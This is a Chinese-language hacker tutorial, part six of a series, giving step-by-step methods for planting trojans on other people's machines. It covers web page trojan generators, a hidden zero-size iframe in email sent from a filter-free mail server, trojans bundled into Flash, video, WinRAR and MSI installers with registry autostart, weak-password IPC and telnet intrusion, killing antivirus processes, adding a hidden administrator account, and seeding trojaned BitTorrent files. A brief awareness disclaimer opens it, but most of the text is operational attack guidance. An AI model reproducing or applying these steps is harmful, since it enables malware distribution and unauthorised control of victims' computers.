黑客教程六:木馬傳播技術
木馬的原理和使用其實是很簡單的,但問題是我們如何讓我們的木馬能夠種植到別人的機器上呢?
要知道如果不能在別人計算機上種植木馬,那就只能在自己機器上自娛自樂了。接下來我就介紹一些黑客常用的木馬種植技術,希望大家能通過學習增強防範木馬的意識,儘量避免以下的一些問題。
第一招:網頁木馬製作。
由於目前上互聯網的人往往都要使用IE這個軟件,所以黑客們都把很多的經歷投入到了 IE的研究上。結果就是IE的漏洞不斷的被爆出。關於漏洞的具體問題,我們在後面的章節再介紹。這裏我們提到的就是一種可以遠程執行的漏洞,簡單的說,就是你看了我的網頁,由於你的IE有漏洞,就會自動執行我所指定的那個文件,如果這個文件是木馬,你就慘了。
有人把這種攻擊方式形象的比喻成“網頁掛馬”,再加上跨站技術,弄得現在都人心惶惶的。(用firefox上網,危險小得多)
不過,大家可能也會有疑問:就咱這水平,連個HTML都不會寫,怎麼掛啊?迷糊。這就 要感謝網絡上的那些高手了,他們不辭辛苦的爲我們寫了很多漏洞利用程序。比如:老丁網頁木馬生成器。(大家看到筆記時,可能這個漏洞早就被多數人補上了,不過沒關係,類似漏洞不斷的爆,類似軟件不斷的出,用法差不多)。使用過程如下:
1、準備一個空間
2、配置好馬兒,假設名字爲mm.exe
3、打開老丁,輸入http://你的地址/ma/mm.exe,再點生成網頁。
4、把生成的網頁laoding.htm傳到服務器上,再把mm.exe傳到ma這個子目錄。
這樣,只要有人訪問laoding.htm這個網頁就會中馬啦。
第二招:郵件攜帶
用方法一做好的木馬傳到空間上以後,就可以在寫郵件的時候,選擇HTML編輯方式(如果是outlook,新建郵件時點“察看”-“編輯源文件”,foxmail你自己找找看),再加入以下內容,實現在網頁中包含一個框架:
"<iframe src=" http://xxxxx.com/xxxx.htm" ; width="0" height="0"></iframe>",這招夠陰毒。以前試過這一招,挺好用的。
不過,這一招也有些問題。目前的SMTP在發信時都會把包含這個框架的郵件過濾掉。所以我們只能自己創建MAIL服務器了。好在Mdaemon很好用,大家安裝配置完在安全菜單中把框架過濾那個勾去掉就行了。用你自己的SMTP發信吧!
第三:在flash文件中捆綁
打開flashMX,新建影片或打開其它影片(.swf),創建一個空白關鍵幀,選擇動作-瀏覽器-雙擊geturl,輸入網頁地址,再點動作-影片控制-停止動作,導出電影文件即可。FLASH沒怎麼用過,這回才知道,原來看flash也要小心啊。
第四:視頻傳播
用realmedia editor,工具-合併事件 事先寫個文本文件,內容是: u 00:5.0 00:8.0 網馬網址,這樣就可以了。
第五:文件捆綁
不說了,工具太多。把一個正常的文件和木馬捆綁在一起,在找個圖標掩飾一下就行。但我要說的是:無論如何,捆綁後的擴展名都一定是".exe"。
如果大家沒有工具,也可以用winrar捆綁。方法是把正常文件和木馬放在一,記錄兩個文件的名字。然後把兩個文件都選中,右鍵-添加到壓縮文件。再選中“創建自解壓文件”。然後在“高級”-“自解壓選項”中,寫好壓縮前運行的文件(正常文件),寫好壓縮後運行文件(木馬),再選靜默模式中的全部隱藏就行了。
第六:通過MS較新的軟件安裝包MSI也可以捆綁木馬
1、取得正常安裝後的文件,最好使用軟件的綠色版,把所有文件和木馬文件放在同一個目錄。
2、使用advance installer,到霏凡可以找到crack版。新建工程,選擇專業版-新建工程嚮導,點擊下一步、瀏覽選擇準備好的目錄。
3、有快捷方式的選擇地方,把軟件包中的主程序勾選,軟件語言據實填寫。
4、最後一步,絕對不要選:現在創建。這樣就會進入下一步,軟件的主程序界面。
5、選“文件或文件夾”,點開“windows volume”,新建一個system32,再把木馬拽過去,這樣MSI安裝完成後,木馬會自動放在這個目錄中。
6、選“註冊表”,在HKCU-software-microsoft-windows-current version-run中加載提到的木馬文件即可。(當然,如果系統中安裝有瑞星這樣可以監控系統註冊表的軟件,安裝到此步時會出現提示。)
7、如果木馬支持服務啓動,也可以在服務-安裝服務上點右鍵-新建服務初始化,
8、在左側菜單選“自定義操作”,在安裝執行順序下的install上右鍵,選新建安裝的自定義操作,選中木馬文件,選“異步執行,不等待返回”,這樣可以避免安裝出現延遲,在執行選項中選確認(絕不能選立即執行)。
9、F7生成工程文件即可。
第七:配合掃描工具
本例可以使用流光,也可以使用傻瓜IPC掃描器。
1、用流光掃描有IPC漏洞的計算機(就是設置了弱密碼計算機)
2、掃描完成後,點工具菜單-IPC工具-種植者
找到配置好的木馬文件-再選中木馬種植的路徑-出現提示“指定的程序將在**秒後執行”
3、等待肉雞上線即可。
注:本實驗成功機率較小,2003 2000等系統爲防止有人加自動運行程序,作了保護。如果目標主機上有殺軟,也會殺掉木馬。如果目標主機沒有隱含共享,也沒有其它共享目錄,則更無法實現。
第八:手工開telnet種植
1、最簡單就是用阿D工具包,找到其中的肉雞掃描,找到弱密碼的肉雞後,點:打開telnet服務。
2、把查看進行和刪除進行的兩個程序:pslist.exe pskill.exe 以及木馬文件上傳到一個FTP服務器。
3、telnet x.x.x.x "telnet連接目標主機
通過ftp連接到放了好多黑客軟件的服務器。ftp y.y.y.y
mget * "下載所有文件
pslist 查看所有進程
pskill 殺掉殺毒軟件進程
如果殺毒軟件實現關不掉(許多殺軟有進程保護機制),就只好做我們最不忍心的事兒了(刪除殺毒軟件的所有文件,再重啓他的機器)
4、執行木馬
5、留下後門,大家可以用以下的方法,但最好還是克隆一個管理員帳號,如果不會,就baidu一下,網上很多說明。
net user bob$ /add
net localgroup administrators bob$ /add
提示:如果關閉了ipc$共享,或對方計算機密碼無法破解,此辦法無效。另外,針對於不是空密碼的簡單密碼,可以考慮在掃描工具中配合事先生成的字典。
第九:BT捆綁
1、掌握一個最新最受歡迎的電影,用以下方法之一進行捆綁
文件捆綁器:缺點易被發現擴展名的問題。
文件欺騙法:製做N個EXE文件,有的綁木馬,有的不綁。
2、用bt軟件生成種子
3、到網站推介種子,將來下的人越多,中馬的人越多。
第十:蜜罐種植法
在計算機上開一個guest可訪問的共享,裏邊放一些捆綁了木馬的文件,然後就等着一些小鳥進洞吧!!!
以上提到的方法還遠沒有把黑客種馬的技術說完全(筆者水平也就這樣兒了),所以黑客們的欺騙手段真的是防不勝防。所以,大家一定要擦亮眼睛。中個馬不要緊,但作爲一名IT專業人士,咱可丟不起那人啊。
好了,這一章就到這裏,敬請關注連載。